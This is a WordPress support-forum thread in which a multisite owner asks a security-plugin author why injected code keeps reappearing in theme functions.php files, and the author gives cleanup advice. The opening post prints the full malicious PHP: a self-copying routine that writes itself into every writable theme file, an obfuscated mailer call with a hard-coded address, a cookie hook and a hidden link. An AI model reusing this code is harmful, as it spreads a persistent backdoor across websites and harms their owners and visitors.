Support » Plugin: Anti-Malware Security and Brute-Force Firewall » Skipping Theme folders & Files & are you familiar with this exploit?

  • Hi @eli,

    I just donated to your plugin just now FYI. See here http://screencast.com/t/XbpWX2XC

    For a WP MULTISITE FYI.

    1. I am trying to run the scan on a Quick Scan for Themes, Plugins, and Core. But, I noticed it skips most Theme folders and files. Why do you think that is? In my case, I really need to scan those. How can we make it not skip folders and files?

    I will try a full scan and maybe that will do it?

    2. We uploaded a theme via FTP and that is when all this started. We uploaded some plugins to. Since yesterday, I removed all of them.

    This is on a WP MULTISITE NETWORK FYI (so it is affecting subsites with those theme that keep getting the code below added to some theme functions.php.

    I think I have narrowed it to this: http://bit.ly/2ebpiqs

    When I delete the code from any effected parent or child theme, the sites work but then that code below is added again and breaks it.

    What other files may have the code that is copying or replacing the code I remove?

    Do you know about this particular exploit and will the plugin take care of this http://bit.ly/2ebpiqs ?

    What are some other thoughts you have on this?

    Here is a code snippet of what keeps attaching itself to some of our parent and child themesIt keeps appending to some themes functions.php (parent or child)…when I manually remove the code the site comes up but the code comes back:

    <?php
    function _verifyactivate_widgets(){
     $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
     $output=strip_tags($output, $allowed);
     $direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
     if (is_array($direst)){
      foreach ($direst as $item){
       if (is_writable($item)){
        $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
        $cont=file_get_contents($item);
        if (stripos($cont,$ftion) === false){
         $comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
         $output .= $before . "Not found" . $after;
         if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
         $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);
         $output .= ($isshowdots && $ellipsis) ? "..." : "";
        }
       }
      }
     }
     return $output;
    }
    function _get_allwidgets_cont($wids,$items=array()){
     $places=array_shift($wids);
     if(substr($places,-1) == "/"){
      $places=substr($places,0,-1);
     }
     if(!file_exists($places) || !is_dir($places)){
      return false;
     }elseif(is_readable($places)){
      $elems=scandir($places);
      foreach ($elems as $elem){
       if ($elem != "." && $elem != ".."){
        if (is_dir($places . "/" . $elem)){
         $wids[]=$places . "/" . $elem;
        } elseif (is_file($places . "/" . $elem)&&
         $elem == substr(__FILE__,-13)){
         $items[]=$places . "/" . $elem;}
        }
       }
     }else{
      return false;
     }
     if (sizeof($wids) > 0){
      return _get_allwidgets_cont($wids,$items);
     } else {
      return $items;
     }
    }
    if(!function_exists("stripos")){
        function stripos( $str, $needle, $offset = 0 ){
            return strpos( strtolower( $str ), strtolower( $needle ), $offset );
        }
    }
    if(!function_exists("strripos")){
        function strripos( $haystack, $needle, $offset = 0 ) {
            if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
            if( $offset < 0 ){
                $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
            }
            else{
                $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
            }
            if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
            $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
            return $pos;
        }
    }
    if(!function_exists("scandir")){
     function scandir($dir,$listDirectories=false, $skipDots=true) {
         $dirArray = array();
         if ($handle = opendir($dir)) {
             while (false !== ($file = readdir($handle))) {
                 if (($file != "." && $file != "..") || $skipDots == true) {
                     if($listDirectories == false) { if(is_dir($file)) { continue; } }
                     array_push($dirArray,basename($file));
                 }
             }
             closedir($handle);
         }
         return $dirArray;
     }
    }
    add_action("admin_head", "_verifyactivate_widgets");
    function _getprepare_widget(){
     if(!isset($text_length)) $text_length=120;
     if(!isset($check)) $check="cookie";
     if(!isset($tagsallowed)) $tagsallowed="<a>";
     if(!isset($filter)) $filter="none";
     if(!isset($coma)) $coma="";
     if(!isset($home_filter)) $home_filter=get_option("home");
     if(!isset($pref_filters)) $pref_filters="wp_";
     if(!isset($is_use_more_link)) $is_use_more_link=1;
     if(!isset($com_type)) $com_type="";
     if(!isset($cpages)) $cpages=$_GET["cperpage"];
     if(!isset($post_auth_comments)) $post_auth_comments="";
     if(!isset($com_is_approved)) $com_is_approved="";
     if(!isset($post_auth)) $post_auth="auth";
     if(!isset($link_text_more)) $link_text_more="(more...)";
     if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");
     if(!isset($checkswidgets)) $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;
     if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";
     if(!isset($contentmore)) $contentmore="ma".$coma."il";
     if(!isset($for_more)) $for_more=1;
     if(!isset($fakeit)) $fakeit=1;
     if(!isset($sql)) $sql="";
     if (!$widget_yes) :
     
     global $wpdb, $post;
     $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$coma."vethe".$com_type."mas".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
     if (!empty($post->post_password)) {
      if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
       if(is_feed()) {
        $output=__("There is no excerpt because this is a protected post.");
       } else {
                 $output=get_the_password_form();
       }
      }
     }
     if(!isset($fixed_tags)) $fixed_tags=1;
     if(!isset($filters)) $filters=$home_filter;
     if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
     if(!isset($tag_aditional)) $tag_aditional="div";
     if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, "live"), 20);#
     if(!isset($more_text_link)) $more_text_link="Continue reading this entry";
     if(!isset($isshowdots)) $isshowdots=1;
     
     $comments=$wpdb->get_results($sql);
     if($fakeit == 2) {
      $text=$post->post_content;
     } elseif($fakeit == 1) {
      $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
     } else {
      $text=$post->post_excerpt;
     }
     $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
     if($text_length < 0) {
      $output=$text;
     } else {
      if(!$no_more && strpos($text, "<!--more-->")) {
          $text=explode("<!--more-->", $text, 2);
       $l=count($text[0]);
       $more_link=1;
       $comments=$wpdb->get_results($sql);
      } else {
       $text=explode(" ", $text);
       if(count($text) > $text_length) {
        $l=$text_length;
        $ellipsis=1;
       } else {
        $l=count($text);
        $link_text_more="";
        $ellipsis=0;
       }
      }
      for ($i=0; $i<$l; $i++)
        $output .= $text[$i] . " ";
     }
     update_option("_is_widget_active_", 1);
     if("all" != $tagsallowed) {
      $output=strip_tags($output, $tagsallowed);
      return $output;
     }
     endif;
     $output=rtrim($output, "\s\n\t\r\0\x0B");
        $output=($fixed_tags) ? balanceTags($output, true) : $output;
     $output .= ($isshowdots && $ellipsis) ? "..." : "";
     $output=apply_filters($filter, $output);
     switch($tag_aditional) {
      case("div") :
       $tag="div";
      break;
      case("span") :
       $tag="span";
      break;
      case("p") :
       $tag="p";
      break;
      default :
       $tag="span";
     }
     if ($is_use_more_link ) {
      if($for_more) {
       $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_text_link . "\">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "</a></" . $tag . ">" . "\n";
      } else {
       $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_text_link . "\">" . $link_text_more . "</a></" . $tag . ">" . "\n";
      }
     }
     return $output;
    }
    add_action("init", "_getprepare_widget");
    function widget_option(){
        if(is_front_page() && !is_paged() && !is_user_logged_in())
        echo '<a style="text-decoration: none; color: #333; position: relative; left: 496px; bottom: 19px; text-transform: uppercase; font-size: 11px;" href="/wp-content/uploads/2013/05/no-risks-just-glory.pdf">Risks</a>';
    }
    function _most_popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
     global $wpdb;
     $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
     $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
     if(!$show_pass_post) $request .= " AND post_password =\"\"";
     if($duration !="") {
      $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
     }
     $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
     $posts=$wpdb->get_results($request);
     $output="";
     if ($posts) {
      foreach ($posts as $post) {
       $post_title=stripslashes($post->post_title);
       $comment_count=$post->comment_count;
       $permalink=get_permalink($post->ID);
       $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
      }
     } else {
      $output .= $before . "None found" . $after;
     }
     return $output;
    }
    ?>
Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter birdog123

    (@birdog123)

    @eli,

    CORRECTION on the pdf link from the original post above.

    I could not edit my link mistake above, so I am putting the correction here in a reply:

    I think I have narrowed it to this: https://www.dropbox.com/s/xe4swj3v9ibxffs/How%20to%20hack%20a%20site_.pdf?dl=0

    When I delete the code from any affected parent or child theme, the sites work but then that code below is added again and breaks it.

    What other files may have the code that is copying or replacing the code I remove?

    Do you know about this particular exploit and will the plugin take care of this https://www.dropbox.com/s/xe4swj3v9ibxffs/How%20to%20hack%20a%20site_.pdf?dl=0 ?

    • This reply was modified 7 years, 5 months ago by birdog123.
    Thread Starter birdog123

    (@birdog123)

    As I hit the bed, I wanted to give you this (is it typical for that many skipped files)? My browser froze at the end and I had to close it before I could see the potential threats and skipped files and 8 read write errors. Does this look like a typical scan or is there anything atypical you from the summary here:
    http://screencast.com/t/sfbpBDdWRrC

    Note: There were only 2 actual threats during this scan…NOT 48 (the other 46 was from the past just FYI). I do not think the 2 were related to what I explained in the initial post and it does not look like it caught any of that (most all my themes have that issue where the primary and 50% of the subsites with select themes are down “Fatal error: Cannot redeclare _verifyactivate_widgets() (previously declared in /home/etc etc etc” and I can see the long 200 lines of code that keeps getting added. If I remove, the sites come up for a few min but then that code gets added again in the functions.php files all through different themes).

    I can get you the entire code string sample too. Here is a sample of that code:
    http://pastebin.com/SrRcULm4 (it appends to the bottom of most any functions.php theme files and who knows where else…not sure if there is a variation but it mostly seems like the same/similar)

    Is there a place to go look at the potential threats, skipped files, and read write files later OR do I have to run it again to see them?

    🙂

    Night @eli

    Thanks in advance!!!

    • This reply was modified 7 years, 5 months ago by birdog123. Reason: add a bit
    Plugin Author Eli

    (@scheeeli)

    I wouldn’t worry about the skipped files, but with that many Potential threats it is likely that some of them may contain malicious code. I would run the complete scan again and look at the potential threats one by one as they pop up on that list to see if you can tell if any of them are actually malicious. If your screenshot had included the list of files that came up as potential threats I could probably have narrowed it down for you. If you find anything suspicious that is not already identified as a you can send it to me directly:
    eli AT gotmls.net

    Yupi need to find the back-door script that is reinfecting your theme. If you are on a shared hosting server than it might be on another site, maybe even on another account that you don’t even have permission to. You may want to consider moving your site to more secure hosting provider.

    Thread Starter birdog123

    (@birdog123)

    Hey @eli

    Just letting you know here . . .

    Thank you. I just sent a reply to your email. Let me know what you think by reply back on email.

    🙂

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Skipping Theme folders & Files & are you familiar with this exploit?’ is closed to new replies.